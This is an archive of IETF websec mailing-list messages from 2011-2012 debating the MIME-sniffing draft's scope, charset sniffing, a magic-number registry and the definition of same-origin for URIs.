Re: [websec] Meeting minutes uploaded

2012-11-14 Thread Larry Masinter
Re Mime sniffing, the minutes reported:

> Nobody in the group objected
> to having this move to WHAT-WG, and according to Larry Manister, the
> W3C is also fine with referencing the WHAT-?WG document, so the work
> item will be removed from our charter.

I did not say this. What I said in the meeting was that I had no objection to 
the working group dropping the work in the IETF.

To elaborate:
* I think dropping the work is the logical action if none of the implementors 
are willing to do the work in the IETF.

* I do not speak for W3C and what the W3C is "Fine with".
* However, I believe W3C management is concerned about insuring stable  
normative references in W3C specs, but they will deal with those.

Larry

___
websec mailing list
websec@ietf.org
https://www.ietf.org/mailman/listinfo/websec


[websec] scope of mimesniff: roles vs. contexts vs. delivery channels

2012-01-11 Thread Larry Masinter
Going back to the "scope" question, should the mimesniff document cover 
sniffing in contexts other than browsers, e.g., by web servers during file 
upload, by proxies or firewalls or gateways, by spiders or search engines, etc.?

Within the browser context, does it cover sniffing in special applications like 
font, video, style sheet, script contexts, where more is known about the type 
that is wanted?

The dimension of 'roles' is somewhat orthogonal to the dimension we were 
talking about previously (whether the specification should cover sniffing of 
content delivered by means other than HTTP.

It seemed that the sentiment previously was to cover a broad scope of delivery 
channels: sniffing should cover the broad scope of sniffing of content 
delivered by FTP or through (mounted) file system access, etc., and that the 
intent was also to cover a broad scope of contexts (including font, video, 
style sheet, etc.).   

But what about the other roles? I think we could address them at least to some 
degree, if only to lay out what the constraints are, or what, say, a firewall 
should do (scanning content in a firewall should likely scan the data as it 
might appear in the likely formats that any recipient might interpret the data, 
for example.)

Larry
--
http://larry.masinter.net






___
websec mailing list
websec@ietf.org
https://www.ietf.org/mailman/listinfo/websec


[websec] When is sniffing heuristic?

2012-01-08 Thread Larry Masinter
There are several different situations where sniffing is of necessity 
heuristic, because you are 'guessing' the intent of the content.
These are due to the fact that the set of possible valid Content-Type values 
does not partition the   space of possible bodies.

There may be other situations where sniffing is heuristic, but in these cases, 
sniffing is *necessarily* heuristic because there are multiple results which 
are valid, and knowing the right result requires additional information about 
the intent of the communication. The heuristic comes presumably from a manual 
examination of some web material where such information about intent is known, 
and projecting that the generalization applies to all such material and cases.

a) Specializations:

A file which is, for example, application/xhtml+xml is, of necessity, also a 
valid file of type application/xml. If you were to "sniff" some content that 
was valid application/xhtml+xml, you could also legitimately claim it was 
application/xml.
Most data types which are 'text' are also text/plain.
Every type is a subset of application/octet-stream.

There are numerable examples of this, and a large number of failure cases, 
e.g., zip-based packaging formats being sniffed as zip when the specialization 
isn't correctly recognized,  image/dng which is sniffed to be image/tiff, etc.


b) "Polyglot":

This is a situation where data is intentionally prepared to be interpretable as 
two different media types, possibly to be served and later processed as either, 
where the intention of the content is to behave similarly for ordinary 
processing, but amenable to specialized processing only defined for one or the 
other media type. The XHTML/HTML polyglot spec

http://dev.w3.org/html5/html-xhtml-author-guide/

is of course is the most relevant use case. The same content could be sniffed 
to be either type.  This is different from the specialization case because 
neither of the media types are subsets of the other.

c) "Multiview"

I don't know exactly what to call this, but it is the situation where the same 
content is valid as two different media types intentionally, the media types do 
not overlap but the treatment as the different types is intentionally 
different.  The use case for multiview I was looking at was one where the same 
content could be viewed as XHTML  (for a presentational view) and also as RDF 
(for a data point of view).

This is different from specialization (since the two types overlap but one is 
not a subset of the other), and polyglot (since the material is intended to 
have different meaning in its ordinary application).


___
websec mailing list
websec@ietf.org
https://www.ietf.org/mailman/listinfo/websec


[websec] more on sniffing

2012-01-08 Thread Larry Masinter


  HTTP provides a way of labeling content with its
  Content-Type, as an indication of the file format / language by
  which the content is to be interpreted.  Unfortunately, many web
  servers, as deployed, supply incorrect Content-Type header
  fields with their HTTP responses.  In order to be compatible
  with these servers, web clients would consider the content of
  HTTP responses as well as the Content-Type header fields when
  determining how the content was interpreted (the "effective
  media type").  Looking at content to determine its type (aka
  "sniffing") is also used when no Content-Type header is
  supplied.


Seemed important to define "sniffing".


  
  Q: Why doesn't file upload sniff? 
  Q: where is the concept
  of 'privilege' defined?
   Why not treat sniffed content as a
  different origin to prevent XSS? 
  

I'm not sure, but at least some of the bigger unaddressed issues could be in 
the document? Probably the "status of this document" should just point to the 
tracker and I should enter in things as issues, not sure how the group wants to 
track these.


  However, overly ambitious sniffing has resulted in a number
  of security issues in the past. For example, consider a simple
  server which allows users to upload content, which is then
  served as simple content such as plain text or an images.
  However, if the content is subsequently 'sniffed' to be active
  content; for example, a malicious user might be able to leverage
  content sniffing to mount a cross-site script attack by
  including JavaScript code in the uploaded file that a user agent
  treats as text/html.

As I noted before, I wish there were more examples of sniffing security issues 
since that's the main justification for this document, at least as a 'websec' 
document.

  This document describes a method for sniffing that carefully
  balances the compatibility needs of user agent implementors with the
  security constraints.

I only changed "algorithm" to "method" because of the many unspecified options 
(e.g., how long to wait for additional data).


  Often, sniffing is done in a context where the use
   of the data retrieved is not merely for independent presentation,
but for embedding (as an image, as video) or other uses
(as a style sheet, a script). 

I think this is the crux of some additional material, where you know that 
you're sniffing  a font or a script or a style sheet, and that knowledge 
influences the sniffing decision.

  One can consider 'sniffing' in several categories:

   
Content delivered via a channel which does not allow
  supplying Content-Type 
Content delivered via HTTP, but No Content-Type supplied
Content-Type is malformed
 Content-Type is duplicated with different values
Content-Type is syntactically legal, but content clearly 
does not
   match constraints of specified content-type. 
 Content-Type is syntactically legal, content may actually match
   constraints of specified content-type, but the content
   is intended for use in a limited context, in which the
   content could also be interpreted as another type.
 Content matches the specified content-type constraints, and that
   type is appropriate for the context of use, but there is some
   other belief that content has been mislabeled.
   

   The supplied content-type usually comes from HTTP, but in
   some situations, the link to the content contains a
   content-type.  (For example, in a style sheet or script.)
  

This is trying to address the question of when sniffing might result in "false 
positives".   The main issue is that sniffing needs to come up with a 
definitive answer ("what is this") even in situations where the signature of 
the data is consistent with multiple results (data could be interpreted as 
application/octet-stream, text/plain, application/xml, 
application/something1+xml, application/something2+xml, and all of those match 
the signature data; same issue happens with zip-based packaging formats...

  ftp: and file: resources also examine the file extension.

The widget packaging recommendation, which normatively references some version 
of sniffing, also uses file extensions for some content and not others, but I 
haven't figured out yet where that belongs.


   The methods described here have been constructed with
  reference to content sniffing algorithms present in popular user
  agents, an extensive database of existing web content, and
  metrics collected from implementations deployed to a sizable
  number of users .

  For reasons discussed in http://www.w3.org/2001/tag/doc/mime-respect,
 sniffing should be avoided when the content could likel

Re: [websec] mimesniff feedback, part 2

2012-01-08 Thread Larry Masinter
I've started on editing the sniffing document in earnest. 

Foolishly, I started going through it from the beginning.  Here's a take at the 
Abstract to make the scope clearer:

  HTTP provides a way of labeling content with its
  Content-Type, an indication of the file format / language by
  which the content is to be interpreted.  Unfortunately, many web
  servers, as deployed, supply incorrect Content-Type header
  fields with their HTTP responses.  In order to be compatible
  with these servers, web clients would consider the content of
  HTTP responses as well as the Content-Type header fields when
  determining how the content was interpreted (the "effective
  media type").  Looking at content to determine its type (aka
  "sniffing") is also used when no Content-Type header is
  supplied.  Overly ambitious sniffing has resulted in a number of
  security issues in the past.  This document specifies methods
  and options for computing an effective media type, in a way that
  addresses both security and compatibility considerations.
  It also discusses the use of sniffing in contexts other than
  delivery of content via HTTP.
  

I wanted to address the scope by making it clear that the scope of the document 
included sniffing outside of content delivered via HTTP.

*** Shouldn't sniffed content have a different origin than the content as 
labeled?  The only "privilege upgrade" that I've come across seem to be 
cross-origin ones. 

*** Is sniffing used by servers when clients use file-upload? Doe web servers 
do sniffing on content to decide what media type to label the content with? Or 
is sniffing really only scoped  to apply to web browsers?



  HTTP provides a way of labeling content with its
  Content-Type, as an indication of the file format / language by
  which the content is to be interpreted.  Unfortunately, many web
  servers, as deployed, supply incorrect Content-Type header
  fields with their HTTP responses.  In order to be compatible
  with these servers, web clients would consider the content of
  HTTP responses as well as the Content-Type header fields when
  determining how the content was interpreted (the "effective
  media type").  Looking at content to determine its type (aka
  "sniffing") is also used when no Content-Type header is
  supplied.

I tried to introduce "effective media type" as it was used before defined.

Where is the term "privilege escalation", as used in this document, defined?

http://en.wikipedia.org/wiki/Privilege_escalation

defines the term in general, and then at the end mentions a couple of examples 
under

===begin Wikipedia quote ===
"Examples of horizontal privilege escalation"

This problem often occurs in web applications. Consider the following example:
User A has access to his/her bank account in an Internet Banking application.
User B has access to his/her bank account in the same Internet Banking 
application.
The vulnerability occurs when User A is able to access User B's bank account by 
performing some sort of malicious activity.
This malicious activity may be possible due to common web application 
weaknesses or vulnerabilities.
Potential web application vulnerabilities or situations that may lead to this 
condition include:
* Predictable session ID's in the user's HTTP cookie
* Session fixation
* Cross-site Scripting
* Easily guessable passwords
* Theft or hijacking of session cookies
* Keystroke logging
===end Wikipedia quote ==

But there are no mentions there of sniffing is a source of privilege escalation.

 Surely since this is the main use case the specification is intended to 
mitigate, shouldn't it be described somewhere? 

The examples given in passing in the document seem to be XSS attacks (which 
would be mitigated merely by giving sniffed content a different unique origin, 
wouldn't it?) 

The  abstract implies there might be other attacks too...  are there? what are 
they?

Larry
--
http://larry.masinter.net


___
websec mailing list
websec@ietf.org
https://www.ietf.org/mailman/listinfo/websec


Re: [websec] Define cross-origin

2011-11-27 Thread Larry Masinter
Re http://tools.ietf.org/html/draft-ietf-websec-origin#section-5

So when you say that a URI "has" an origin, that isn't quite true, right? Some 
URIs have infinitely many origins, and you get a new one whenever you ask for 
one. To know when you have to ask for a new one and not reuse the one you got 
to use before, you have to ... what? Is there some mysterious other attribute 
or state that goes along with the URI that you use to decide whether the second 
instance of the "same" URI is different enough to want to get a new origin?


-Original Message-
From: Adam Barth [mailto:i...@adambarth.com] 
Sent: Sunday, November 27, 2011 11:17 AM
To: Larry Masinter
Cc: Tobias Gondrom; websec@ietf.org
Subject: Re: [websec] Define cross-origin

On Sun, Nov 27, 2011 at 9:42 AM, Larry Masinter  wrote:
> In my experience, it's possible make editorial changes without significant 
> hiccup as long as it is clear there is no objection -- and adding a 
> non-controversial term definition would seem to be editorial.
>
> However, I'm really baffled by "Two URIs are the same-origin if their origins 
> are the same."
>
>      NOTE: A URI is not necessarily same-origin with itself.  For
>      example, a data URI [RFC2397] is not same-origin with itself
>      because data URIs do not use a server-based naming authority and
>      therefore have globally unique identifiers as origins.
>
> If "origin" is an attribute of a "URI", then a.origin = a.origin.

Origin is not an attribute of a URI.  It's a value you can compute from a URI.

> If a URI "has" an origin, how can that origin be subject to change, 
> mathematically.
> I suppose this is a result of using a normative algorithm in 4 instead of a 
> set of invariants.

It's a result of how the web works.  However we define origin, it needs to be 
the case that a URI is not necessarily same-origin with itself.

> Perhaps section 5 should instead say:
>
> Two URIs are "same origin" if computing their origins result in the same 
> value, and "cross-origin" if the results are different.
> Note that in this formulation, a URI is not necessarily same-origin with 
> itself; for example, a data URI [RFC2397] is not same-origin with itself 
> because data URIs do not use a server-based naming authority, and different 
> invocations of the "origin" computation will result in different (globally 
> unique) origins.

That's fine, but I would remove the phrase about "formulation".  It does't have 
anything to do with this particular formulation of this concept.  It's a 
consequence of the concept itself.

Adam
___
websec mailing list
websec@ietf.org
https://www.ietf.org/mailman/listinfo/websec


Re: [websec] Define cross-origin

2011-11-27 Thread Larry Masinter
In my experience, it's possible make editorial changes without significant 
hiccup as long as it is clear there is no objection -- and adding a 
non-controversial term definition would seem to be editorial.



However, I'm really baffled by "Two URIs are the same-origin if their origins 
are the same."

  NOTE: A URI is not necessarily same-origin with itself.  For
  example, a data URI [RFC2397] is not same-origin with itself
  because data URIs do not use a server-based naming authority and
  therefore have globally unique identifiers as origins.


If "origin" is an attribute of a "URI", then a.origin = a.origin.  If a URI 
"has" an origin, how can that origin be subject to change, mathematically.
I suppose this is a result of using a normative algorithm in 4 instead of a set 
of invariants. 

Perhaps section 5 should instead say:

Two URIs are "same origin" if computing their origins result in the same value, 
and "cross-origin" if the results are different.
Note that in this formulation, a URI is not necessarily same-origin with 
itself; for example, a data URI [RFC2397] is not same-origin with itself 
because data URIs do not use a server-based naming authority, and different 
invocations of the "origin" computation will result in different (globally 
unique) origins.

=

Larry

___
websec mailing list
websec@ietf.org
https://www.ietf.org/mailman/listinfo/websec


Re: [websec] mimesniff feedback, part 2

2011-11-27 Thread Larry Masinter
> Depending on how the working group resolves some of the issues it is 
> considering, the draft will need to be substantially re-written.  For 
> example, if we 
> decide to use an IANA registry (as seems likely) all of the text that Philip 
> commented on will be removed from the document.

I think the body of the text might say "Use the values in the IANA registry", 
but that the "IANA considerations" section would contain all of the 
instructions for how to set up the registry.

That is, the document would stay the authoritative source for the _initial_  
contents of the registry, but updates and additions could be managed through 
whatever registration process we decided on, without having to update the 
document or algorithm itself.

Larry

___
websec mailing list
websec@ietf.org
https://www.ietf.org/mailman/listinfo/websec


[websec] Sniffing test suite?

2011-10-28 Thread Larry Masinter
http://greenbytes.de/tech/tc/httpcontenttype/

might be a model for building up a sniffing test suite for HTTP  (the sniffing 
test suite for ftp and file -- and others -- would have to be coordinated.)


___
websec mailing list
websec@ietf.org
https://www.ietf.org/mailman/listinfo/websec


Re: [websec] Issue 17: Registry for magic numbers

2011-10-26 Thread Larry Masinter
A standards specification should meet the requirements of the use cases that 
are in scope for the specification. 

If you only evaluate adequacy against  a narrow set of requirements, then the 
scope should be limited to those situations where those requirements are 
adequate.

If you're evaluating against what "a  user agent needs to perform in order to 
be competitive in the browser market"  then the only use cases you're 
validating against are "popular web browsers in 2012", which is a very narrow 
scope.

If, on the other hand, you expect the standard to have value over the long 
term, you need a longer-term and broader set of requirements and use cases, 
which will add additional complexity to meet requirements.

Larry


-Original Message-
From: Adam Barth [mailto:i...@adambarth.com] 
Sent: Tuesday, October 25, 2011 11:45 PM
To: Larry Masinter
Cc: Tobias Gondrom; websec@ietf.org
Subject: Re: [websec] Issue 17: Registry for magic numbers

You've posed a large number of questions.  I'll do my best to answer them.

On Tue, Oct 25, 2011 at 11:31 PM, Larry Masinter  wrote:
> This gets back to the question of the scope of the document. Does it, 
> or does it not, handle sniffing of arbitrary blobs of data that come 
> in without any content-type,

User agents that implement sniffing are expected to sniff HTTP responses that 
lack a Content-Type header, yes.

> blobs of data labeled application/octet-stream,

User agents that implement sniffing are not expected to sniff HTTP responses 
that contain Content-Type header with the value application/octet-stream.

> and data coming via ftp (through ftp URIs)

Yes.

> or thumb drives

Yes.

>or mounted NFS file systems or whatever?

Yes.

You can answer these questions by reading the document.  For example, the 
document explicitly states the set of Content-Type header values that trigger 
sniffing.  The document also explicitly calls out FTP as an example.

> Does it, or does it not, handle sniffing rules inside ZIP packaged web 
> applications?

Not as described by this document.  However, I've been told that another 
document has re-used the algorithm for that purpose.

> If it does, then sniffing should cover everything that is sniffable, 
> including almost all MIME types

Why is that?  The document describes what is essentially the minimal amount of 
sniffing a user agent needs to perform in order to be competitive in the 
browser market.  I don't think we should be encouraging sniffing beyond that.

> -- you say "most MIME types that get registered don't need sniffing 
> rules", I don't know what the percentage is,

With the possible exception of fonts, I believe the document describes all the 
sniffing rules that are necessary today.  You can compare with list of MIME 
types in the document with the list of registered MIME types if you wish to get 
a sense of what I mean when I say that "most"
don't need sniffing rules.

> but after all, don't you want to be able to discover file types??

I'm not sure what you mean by "discover file types".  There's no discovery 
going on here.

> Of course, maybe that broad applicability of sniffing isn't appropriate, but 
> then ... where's are the boundaries?

The boundaries are exactly what's described in the document.  There's been a 
great deal of research and implementation experience poured into the document 
to determine precisely where to draw the boundaries.
 As far as I can tell, the document describes the optimal point.  If you have 
data that shows otherwise, I'd like to see it.

> Which situations are in scope vs. not?

The criteria I would use is the following one:

"Given a diverse market of browser vendors, is this a sniffing algorithm that 
all browser vendors are mutually interested in converging upon."

If the answer is "yes", then you've identified the correct scope and rules.  If 
"no", then the spec needs to be improved.  If there is no such set of rules, 
then this endeavor is a waste of time and any spec we create will be dead 
letter.

> And don't some of the "in-scope" situations need almost all MIME types to be 
> sniffable?

No.

Adam


> -Original Message-
> From: websec-boun...@ietf.org [mailto:websec-boun...@ietf.org] On 
> Behalf Of Adam Barth
> Sent: Tuesday, October 25, 2011 9:00 PM
> To: Tobias Gondrom
> Cc: websec@ietf.org
> Subject: Re: [websec] Issue 17: Registry for magic numbers
>
> Yeah, I think we're much better off creating a new registry rather than using 
> the MIME registry.  The truth is that most MIME types that get registered 
> don't need sniffing rules.  The only ones that need it are the legacy ones 
> and the ones browser vendor cause to need it because of the 

Re: [websec] Issue 17: Registry for magic numbers

2011-10-25 Thread Larry Masinter
This gets back to the question of the scope of the document. Does it, or does 
it not, handle sniffing of arbitrary blobs of data that come in without any 
content-type, blobs of data labeled application/octet-stream, and data coming 
via ftp (through ftp URIs) or thumb drives or mounted NFS file systems or 
whatever? Does it, or does it not, handle sniffing rules inside ZIP packaged 
web applications?   

If it does, then sniffing should cover everything that is sniffable, including 
almost all MIME types  -- you say "most MIME types that get registered don't 
need sniffing rules", I don't know what the percentage is, but after all, don't 
you want to be able to discover file types??  


Of course, maybe that broad applicability of sniffing isn't appropriate, but 
then ... where's are the boundaries? Which situations are in scope vs. not? And 
don't some of the "in-scope" situations need almost all MIME types to be 
sniffable?

Larry


-Original Message-
From: websec-boun...@ietf.org [mailto:websec-boun...@ietf.org] On Behalf Of 
Adam Barth
Sent: Tuesday, October 25, 2011 9:00 PM
To: Tobias Gondrom
Cc: websec@ietf.org
Subject: Re: [websec] Issue 17: Registry for magic numbers

Yeah, I think we're much better off creating a new registry rather than using 
the MIME registry.  The truth is that most MIME types that get registered don't 
need sniffing rules.  The only ones that need it are the legacy ones and the 
ones browser vendor cause to need it because of the prisoner's dilemma in the 
browser market.

Adam


On Tue, Oct 25, 2011 at 8:52 PM, Tobias Gondrom  
wrote:
> 
> For me the point is, currently we have a table in the document, which 
> inside an RFC is rather static and hard to extend.
> So it looks like a good case for a registry to allow for extendibility 
> for new mime-types. (e.g. we keep the table in the document, create an 
> IANA registry, copy the values to the registry and allow for future 
> entries by expert review) That can either be added to the current 
> Mime-type registry, or we create a new one (e.g. within the websec 
> namespace) with only these elements.
>
> Just my 5cents.
>
> Tobias
>
>
>
> On 25/10/11 05:23, Adam Barth wrote:
>>
>> On Mon, Oct 24, 2011 at 9:07 PM, "Martin J. Dürst"
>>   wrote:
>>>
>>> On 2011/10/25 11:21, Adam Barth wrote:

 http://trac.tools.ietf.org/wg/websec/trac/ticket/17 refers to an 
 IANA registry with magic numbers for various media types.  I wanted 
 to compare them to what's in the draft, but I couldn't find it.  I 
 found the media type registry, e.g., for images:

 http://www.iana.org/assignments/media-types/image/index.html

 but I don't see any magic numbers.  Would someone be willing to 
 point me in the right direction?
>>>
>>> They are in the templates. To get the template for a registration, 
>>> start at the overview page 
>>> (http://www.iana.org/assignments/media-types/index.html).
>>>
>>> Then go to the page that lists all the registration for a give top 
>>> level, e.g. 
>>> http://www.iana.org/assignments/media-types/image/index.html for images.
>>>
>>> Then look at each registration template (click on the link in the 
>>> left column, or in the right column if the left one doesn't have a 
>>> link and the right one is to an RFC). You may then find a magic 
>>> number in the registration template. As an example, for image/jp2, 
>>> the template is at 
>>> http://www.iana.org/assignments/media-types/image/jp2.
>>>
>>> But it looks like earlier templates didn't have a field for a magic 
>>> number, and this and the reasons Anne gave make this information 
>>> helpful for cross-checking, but not much more.
>>
>> == Images ==
>>
>> PNG has a registration template
>> , but lacks a 
>> signature.
>> JPEG doesn't have a template.
>> GIF doesn't have a template.
>> BMP isn't even registered.
>> WEBP isn't even registered.
>> ICO has a registration template
>> > >
>> and has the correct signature.  Yay!
>>
>> == Text ==
>>
>> HTML lacks a registration template.
>>
>> == Application ==
>>
>> PDF doesn't have a template.
>> Postscript doesn't have a template.
>> OGG doesn't have a template.
>> RAR isn't even registered.
>> ZIP has a registration template
>> , but 
>> lacks a signature.
>> GZIP isn't even registered.
>> RSS isn't even registered.
>> Atom lacks a registration template.
>>
>> == Audio ==
>>
>> WAV isn't even registered.
>>
>> == Video ==
>>
>> MP4 lacks a registration template.
>> WebM isn't even registered.
>>
>> This does not look like a promising approach.  Note: I haven't even 
>> looked through all the registrations to see how many have signatures 
>> that we shouldn't be using.
>>
>> Adam
>> ___
>> websec mailing list
>> websec@ietf.org
>> https://www

Re: [websec] font sniffing

2011-10-24 Thread Larry Masinter
It's been emphasized that there is no reason why third parties can't register 
media types if they're wanted. So there should be no barrier to specifying 
content-type for fonts, if that's what is wanted.

Why is it a "lost cause" when no one even tried?

Larry


-Original Message-
From: websec-boun...@ietf.org [mailto:websec-boun...@ietf.org] On Behalf Of 
Anne van Kesteren
Sent: Monday, October 24, 2011 4:44 AM
To: Tobias Gondrom
Cc: websec@ietf.org
Subject: Re: [websec] font sniffing

On Mon, 24 Oct 2011 20:36:50 +0900, Tobias Gondrom  
wrote:
> So a specific use case for this could be helpful - and a volunteer to 
> provide input on by which criteria exactly fonts should be sniffed and 
> help with writing up the font mime-type for the registry (I can help 
> with the latter).

The use case is @font-face, CSS' font linking feature. The criteria I have 
emailed to this list before:

http://www.ietf.org/mail-archive/web/websec/current/msg00235.html


--
Anne van Kesteren
http://annevankesteren.nl/
___
websec mailing list
websec@ietf.org
https://www.ietf.org/mailman/listinfo/websec
___
websec mailing list
websec@ietf.org
https://www.ietf.org/mailman/listinfo/websec


Re: [websec] #21: sniffing of text/html shouldn't override polyglot label of application/xhtml+xml

2011-10-24 Thread Larry Masinter
I don't understand, Philip. A central case of this document involves taking 
documents that look like text/html but are labeled as text/plain and "sniffing" 
them to be text/html after all.

It's claimed that this is necessary, part of most browsers today, regular 
practice, etc.

Are you opposed to specifying sniffing from text/plain to text/html? In any 
case? 

Larry


-Original Message-
From: websec-boun...@ietf.org [mailto:websec-boun...@ietf.org] On Behalf Of 
Philip Gladstone
Sent: Monday, October 24, 2011 9:24 AM
To: websec@ietf.org
Subject: Re: [websec] #21: sniffing of text/html shouldn't override polyglot 
label of application/xhtml+xml



On 10/23/2011 7:52 PM, websec issue tracker wrote:
>
>   (One still might want to sniff text/html when the type is labeled
>   text/plain, for example, but not for other polyglot cases.)
This would be a disaster. For security reasons, a web server needs to know when 
a document will be "executed" rather than "displayed". 
Currently, using text/plain will display any document literally. Causing a 
document that looks like html to be executed will open lots of web sites to XSS.

Philip
___
websec mailing list
websec@ietf.org
https://www.ietf.org/mailman/listinfo/websec
___
websec mailing list
websec@ietf.org
https://www.ietf.org/mailman/listinfo/websec


Re: [websec] #22: content-type sniffing should include charset sniffing

2011-10-23 Thread Larry Masinter
The charset sniffing documentation in the HTML5 document isn't all that 
complicated, anyway. 

And it has to be somewhere. 

What's the point of standardizing sniffing of the internet media type without 
also standardizing the sniffing of all of the relevant parameters the goal 
is to sniff the content-type, the media type by itself isn't what's used.
It's just for text and xml types, the 'charset' parameter is already there.

Also, the algorithm in the document currently is incomplete and inappropriate 
if you're going to sniff XML-based media types, so the fact that the current 
algorithm can get away with hiding "charset guessing" as if it were just on 
octets and not the characters -- well, that's just a superficial work-around.

Larry


-Original Message-
From: "Martin J. Dürst" [mailto:due...@it.aoyama.ac.jp] 
Sent: Sunday, October 23, 2011 11:37 PM
To: Larry Masinter
Cc: Adam Barth; websec@ietf.org
Subject: Re: [websec] #22: content-type sniffing should include charset sniffing

I agree with Adam and Tobias that we should not pull all of charset sniffing 
into this document. Many charset details depend on the mime type in the first 
place, and are carefully described in the respective specs. For some transfer 
protocols, the question of charset may be irrelevant (e.g. for text over 
Websocket, which prescribes and checks for UTF-8).

Larry is right that in some cases, some preliminary charset sniffing is 
necessary to get at some information at the start of the document, but I think 
we should strictly limit this draft to these cases.

Regards,Martin.

On 2011/10/24 13:14, Larry Masinter wrote:
> I was talking about the necessary dependency of the specifications -- that 
> you couldn't specify media type sniffing completely without making at least a 
> normative reference to charset sniffing.
>
> The fact that the code works that way is evidence, of course, but 
> we're not talking about possibility of implementation (where a single 
> implementation is evidence) but rather orthogonality of interfaces 
> (where the question is whether ALL implementations must follow this 
> pattern.)
>
> Larry
>
>
>
>
> -----Original Message-
> From: Adam Barth [mailto:i...@adambarth.com]
> Sent: Sunday, October 23, 2011 8:37 PM
> To: Larry Masinter
> Cc: Tobias Gondrom; websec@ietf.org
> Subject: Re: [websec] #22: content-type sniffing should include 
> charset sniffing
>
> I mean, that's how the code works, so it must be possible.  :)
>
> Adam
>
>
> On Sun, Oct 23, 2011 at 8:32 PM, Larry Masinter  wrote:
>> I know it's complicated, but scanning text is necessarily part of 
>> determining which application/something+xml  you have.  I think (but should 
>> really check before saying this) that XML media type registrations describe 
>> what the DOCTYPE or XML namespace or root element are, and that, to properly 
>> "sniff" them, you'd have to scan text. But before you scan text, you have to 
>> determine charset.
>>
>> So if we're going to support sniffing of media types in general, I don't see 
>> how we can do that without also specifying charset determination.
>>
>>
>>
>> Larry
>> ]
>>
>> -Original Message-
>> From: websec-boun...@ietf.org [mailto:websec-boun...@ietf.org] On 
>> Behalf Of Adam Barth
>> Sent: Sunday, October 23, 2011 8:28 PM
>> To: Tobias Gondrom
>> Cc: websec@ietf.org
>> Subject: Re: [websec] #22: content-type sniffing should include 
>> charset sniffing
>>
>> The charset sniffing is also complicated by the fact that sometimes user 
>> agents need to parse some of the HTML to find a  element.
>> In some situations, user agents need to restart the parsing algorithm, which 
>> is quite delicate and better to describe in the same document as HTML 
>> parsing (at least for use by HTML processing engines).
>>
>> Adam
>>
>>
>> On Sun, Oct 23, 2011 at 8:24 PM, Tobias Gondrom  
>> wrote:
>>> 
>>> I tend not to agree with that.
>>>
>>> The fact that charset sniffing might happen at the same time as 
>>> mime-sniffing does not seem like a strong argument to include this 
>>> in the draft.
>>>
>>> Furthermore I would rather have these issues separate:
>>> First you determine the content-type and then after that you may 
>>> want to determine the charset used within that content-type (if you 
>>> really have to sniff the charset). I can also imagine that charset 
>>> sniffing algorithm might be depending on the application identified 
>>> by the sniffed mime-type, w

[websec] MIME sniffing test suite? Is there one?

2011-10-23 Thread Larry Masinter
I think it would be really helpful to have a test suite for MIME sniffing where 
we can test out what browsers do and various cases where sniffing *should* 
improve the experience, as well as test cases where sniffing makes things 
worse, if there are some.

Probably focusing on the test suite would help resolve some of the issues.

I'm willing to help populate the test suite but perhaps someone could to put up 
the infrastructure?

Larry

___
websec mailing list
websec@ietf.org
https://www.ietf.org/mailman/listinfo/websec


Re: [websec] #22: content-type sniffing should include charset sniffing

2011-10-23 Thread Larry Masinter
I was talking about the necessary dependency of the specifications -- that you 
couldn't specify media type sniffing completely without making at least a 
normative reference to charset sniffing. 

The fact that the code works that way is evidence, of course, but we're not 
talking about possibility of implementation (where a single implementation is 
evidence) but rather orthogonality of interfaces (where the question is whether 
ALL implementations must follow this pattern.)

Larry




-Original Message-
From: Adam Barth [mailto:i...@adambarth.com] 
Sent: Sunday, October 23, 2011 8:37 PM
To: Larry Masinter
Cc: Tobias Gondrom; websec@ietf.org
Subject: Re: [websec] #22: content-type sniffing should include charset sniffing

I mean, that's how the code works, so it must be possible.  :)

Adam


On Sun, Oct 23, 2011 at 8:32 PM, Larry Masinter  wrote:
> I know it's complicated, but scanning text is necessarily part of determining 
> which application/something+xml  you have.  I think (but should really check 
> before saying this) that XML media type registrations describe what the 
> DOCTYPE or XML namespace or root element are, and that, to properly "sniff" 
> them, you'd have to scan text. But before you scan text, you have to 
> determine charset.
>
> So if we're going to support sniffing of media types in general, I don't see 
> how we can do that without also specifying charset determination.
>
>
>
> Larry
> ]
>
> -Original Message-
> From: websec-boun...@ietf.org [mailto:websec-boun...@ietf.org] On 
> Behalf Of Adam Barth
> Sent: Sunday, October 23, 2011 8:28 PM
> To: Tobias Gondrom
> Cc: websec@ietf.org
> Subject: Re: [websec] #22: content-type sniffing should include 
> charset sniffing
>
> The charset sniffing is also complicated by the fact that sometimes user 
> agents need to parse some of the HTML to find a  element.
> In some situations, user agents need to restart the parsing algorithm, which 
> is quite delicate and better to describe in the same document as HTML parsing 
> (at least for use by HTML processing engines).
>
> Adam
>
>
> On Sun, Oct 23, 2011 at 8:24 PM, Tobias Gondrom  
> wrote:
>> 
>> I tend not to agree with that.
>>
>> The fact that charset sniffing might happen at the same time as 
>> mime-sniffing does not seem like a strong argument to include this in 
>> the draft.
>>
>> Furthermore I would rather have these issues separate:
>> First you determine the content-type and then after that you may want 
>> to determine the charset used within that content-type (if you really 
>> have to sniff the charset). I can also imagine that charset sniffing 
>> algorithm might be depending on the application identified by the 
>> sniffed mime-type, which again would speak against throwing it in together 
>> with mime-sniffing
>>
>> Kind regards, Tobias
>>
>>
>>
>> On 24/10/11 00:55, websec issue tracker wrote:
>>>
>>> #22: content-type sniffing should include charset sniffing
>>>
>>>  the HTML5 spec contains some algorithms for sniffing charset, 
>>> overriding
>>>  labeled charset, etc.
>>>
>>>  MIME parameters like charset are as much a part of the content-type 
>>> as the
>>>  base internet media type, and any sniffing of parameters and other
>>>  metadata (overriding content-type or guessing where it is not 
>>> supplied or
>>>  wrong) should be included in this document, since the sniffing will 
>>> happen
>>>  at the same time.
>>>
>>
>> ___
>> websec mailing list
>> websec@ietf.org
>> https://www.ietf.org/mailman/listinfo/websec
>>
> ___
> websec mailing list
> websec@ietf.org
> https://www.ietf.org/mailman/listinfo/websec
>
___
websec mailing list
websec@ietf.org
https://www.ietf.org/mailman/listinfo/websec


Re: [websec] #22: content-type sniffing should include charset sniffing

2011-10-23 Thread Larry Masinter
I know it's complicated, but scanning text is necessarily part of determining 
which application/something+xml  you have.  I think (but should really check 
before saying this) that XML media type registrations describe what the DOCTYPE 
or XML namespace or root element are, and that, to properly "sniff" them, you'd 
have to scan text. But before you scan text, you have to determine charset.

So if we're going to support sniffing of media types in general, I don't see 
how we can do that without also specifying charset determination.



Larry
]

-Original Message-
From: websec-boun...@ietf.org [mailto:websec-boun...@ietf.org] On Behalf Of 
Adam Barth
Sent: Sunday, October 23, 2011 8:28 PM
To: Tobias Gondrom
Cc: websec@ietf.org
Subject: Re: [websec] #22: content-type sniffing should include charset sniffing

